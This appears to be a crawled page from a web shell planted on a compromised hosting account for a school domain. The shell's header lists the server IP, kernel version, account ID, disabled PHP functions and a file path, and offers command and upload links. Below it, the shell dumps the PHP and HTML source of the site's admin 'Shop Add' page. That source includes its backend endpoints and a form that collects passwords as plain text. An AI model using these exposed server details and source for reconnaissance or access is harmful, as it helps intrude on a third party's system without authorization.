Server IP : 2a02:4780:11:1359:0:1d43:a566:2 / Your IP : 216.73.216.161 Web Server : LiteSpeed System : Linux in-mum-web1259.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64 User : u490972518 ( 490972518) PHP Version : 5.6.40 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : ON | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u490972518/domains/ppschool.org.in/public_html/link/../code/../sale_new/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!--A Design by W3layouts Author: W3layout Author URL: http://w3layouts.com License: Creative Commons Attribution 3.0 Unported License URL: http://creativecommons.org/licenses/by/3.0/ --> <?php session_start(); $email=$_SESSION['admin']; if(!isset($email)) { header("location:index.php"); } include("link/header.php"); include("code/dataconnection.php"); ?> <link href="jq/jquery.dataTables.min.css" type="text/css" rel="stylesheet"/> <link href="jq/buttons.dataTables.min.css" type="text/css" rel="stylesheet"/> <script src="jq/jquery.dataTables.min.js"></script> <script src="jq/dataTables.buttons.min.js"></script> <script src="jq/buttons.flash.min.js"></script> <script src="jq/jszip.min.js"></script> <script src="jq/pdfmake.min.js"></script> <script src="jq/vfs_fonts.js"></script> <script src="jq/buttons.html5.min.js"></script> <script src="jq/buttons.print.min.js"></script> <script> function editrow(id) { //alert(id); $("#editmodel12").modal("show"); $("#editbody12").load("code/student_detailscode.php?flag=3&id="+id); } function editrow12(id) { //alert(id); $("#editmodel12").modal("show"); $("#editbody12").load("../code/student_detailscode.php?flag=9&id="+id); } function transferrow(id) { //alert(id); $("#editmodel12").modal("show"); $("#editbody12").load("code/student_detailscode.php?flag=31&id="+id); } function feesrow(id) { //alert(id); $("#editmodel12").modal("show"); $("#editbody12").load("../code/student_detailscode.php?flag=9&id="+id); } //===message==// function messagerow(id) { //alert(id); $("#editmodel").modal("show"); $("#editbody").load("code/student_detailscode.php?flag=7&id="+id); } function editrow12(id) { //alert(id); $("#editmodel12").modal("show"); $("#editbody12").load("code/student_detailscode.php?flag=3&id="+id); } function slip123(application) { //alert(application); $("#editmodel12").modal("show"); $("#editbody12").load("../code/student_detailscode.php?flag=34&application="+application); } $(document).ready(function(){ $("#myform21").submit(function(e){ e.preventDefault(); $.ajax({ url:"code/student_detailscode.php?flag=59", type:"POST", data: new FormData(this), contentType:false, processData:false, success:function(res){ alert(res); $("#myform21").trigger('reset'); }, error:function(){ alert("error"); } }); }); }); //== message==/// function deleterow(id) { //alert(id); var a=confirm("Are you Sure"); if(a==true) { $.ajax({ url:"../code/student_detailscode.php?flag=2", type:"POST", data:{rowid:id}, success:function(res){ //alert(res); //$("#modal").html(res); $("#myform21").submit(); }, error:function(){ alert("error"); } }); } } $(document).ready(function(){ $("#modal").load("code/student_detailscode.php?flag=1"); }); function updaterow(form) { $.ajax({ url:"code/student_detailscode.php?flag=4", type:"POST", data:new FormData(form), contentType:false, // for photo upload ke liye hai processData:false, //for photo upload ke liye hai cache:false, success:function(res){ alert(res); if(res=="Update") { $("#editmodel12").modal("hide"); } }, error:function(){ alert("error"); } }); return false; } //// function updaterow1(form) { $.ajax({ url:"code/student_detailscode.php?flag=4", type:"POST", data:new FormData(form), success:function(res){ alert(res); if(res=="Update") { $("#editmodel12").modal("hide"); } }, error:function(){ alert("error"); } }); return false; } /// function result(id) { $("#editmodel").modal("show"); $("#editbody").load("../code/student_detailscode.php?flag=5&id="+id); } function data(form) { $.ajax({ url:"code/student_detailscode.php?flag=4", type:"POST", data:new FormData(form), success:function(res){ alert(res); if(res=="Update") { $("#editmodel").modal("hide"); } }, error:function(){ alert("error"); } }); return false; } function feesdata(form) { $("#btn").prop("disabled",true); $.ajax({ url:"../code/student_detailscode.php?flag=10", type:"POST", data:new FormData(form), contentType:false, processData:false, success:function(res){ alert(res); $("#editmodel12").modal("hide"); }, error:function(){ alert("error"); } }); return false; } function messagesend(form) { $.ajax({ url:"code/student_detailscode.php?flag=8", type:"POST", data:new FormData(form), contentType:false, // for photo upload ke liye hai processData:false, //for photo upload ke liye hai cache:false, success:function(res){ alert(res); if(res=="Message Send") { $("#editmodel1").modal("hide"); } }, error:function(){ alert("error"); } }); return false; } </script> <!--sidebar end--> <!--main content start--> <section id="main-content"> <section class="wrapper"> <div class="form-w3layouts"> <!-- page start--> <div class="row"> <div class="col-lg-12"> <section class="panel"> <header class="panel-heading"> Shop Add <span class="tools pull-right"> <a class="fa fa-chevron-down" href="javascript:;"></a> <a class="fa fa-cog" href="javascript:;"></a> </span> </header> <div class="panel-body"> <div class=" form"> <form class="cmxform form-horizontal " id="myform21" > <div class="form-group "> <label for="cname" class="control-label col-lg-3">Shop Id</label> <div class="col-lg-6"> <input class=" form-control" name="shopid" type="text" required=""> </div> </div> <div class="form-group "> <label for="cemail" class="control-label col-lg-3">Shop Holder</label> <div class="col-lg-6"> <input class="form-control " type="text" name="shopholder" required=""> </div> </div> <div class="form-group "> <label for="cemail" class="control-label col-lg-3">Password</label> <div class="col-lg-6"> <input class="form-control " type="text" name="password" required=""> </div> </div> <div class="form-group "> <label for="curl" class="control-label col-lg-3">Mobile</label> <div class="col-lg-6"> <input class="form-control " type="number" name="mobile" required> </div> </div> <div class="form-group "> <label for="ccomment" class="control-label col-lg-3">Shop Address</label> <div class="col-lg-6"> <textarea class="form-control " name="saddress" required=""></textarea> </div> </div> <div class="form-group"> <div class="col-lg-offset-3 col-lg-6"> <button class="btn btn-primary" type="submit">Submit</button> <button class="btn btn-default" type="reset">Reset</button> </div> </div> </form> </div> </div> </section> </div> </div> <!-- page end--> </div> </section> <!-- footer --> <div class="footer"> <div class="wthree-copyright"> <p>© 2018 Visitors. All rights reserved | Design by <a href="#">Sark Mart</a></p> </div> </div> <!-- / footer --> </section> <!--main content end--> </section> <script src="js/bootstrap.js"></script> <script src="js/jquery.dcjqaccordion.2.7.js"></script> <script src="js/scripts.js"></script> <script src="js/jquery.slimscroll.js"></script> <script src="js/jquery.nicescroll.js"></script> <!--[if lte IE 8]><script language="javascript" type="text/javascript" src="js/flot-chart/excanvas.min.js"></script><![endif]--> <script src="js/jquery.scrollTo.js"></script> <!-- modal for result--> <div class="modal fade" id="editmodel"> <div class="modal-dialog"> <div class="modal-content"> <div class="modal-heading"> <button class="close" data-dismiss="modal"> <span> × </span> </button> <center><h2 class="modal-title" style="color:green;background-color:yellow"> SEND MESSAGE </h2> </center> </div> <div class="modal-body" id="editbody"> </div> <div class="modal-footer"> </div> </div> </div> </div> <!-- modal for result--> <div class="modal fade" tabindex="-1" role="dialog" aria-labelledby="myLargeModalLabel" id="editmodel12"> <div class="modal-dialog modal-lg"> <div class="modal-content"> <div class="modal-heading"> <button class="close" data-dismiss="modal"> <span> × </span> </button> <center><h2 class="modal-title" style="color:green;background-color:yellow"> UPDATE REGISTRATION FORM</h2> </center> </div> <div class="modal-body" id="editbody12"> </div> <div class="modal-footer"> </div> </div> </div> </div> <!-- modal for result--> <div class="modal fade bs-example-modal-lg" tabindex="-1" role="dialog" aria-labelledby="myLargeModalLabel" id="editmodel123"> <div class="modal-dialog modal-lg"> <div class="modal-content"> <div class="modal-heading"> <button class="close" data-dismiss="modal"> <span> × </span> </button> <center><h2 class="modal-title" style="color:green;background-color:yellow"> UPDATE BANK</h2> </center> </div> <div class="modal-body" id="editbody123"> </div> <div class="modal-footer"> </div> </div> </div> </div> </body> </html>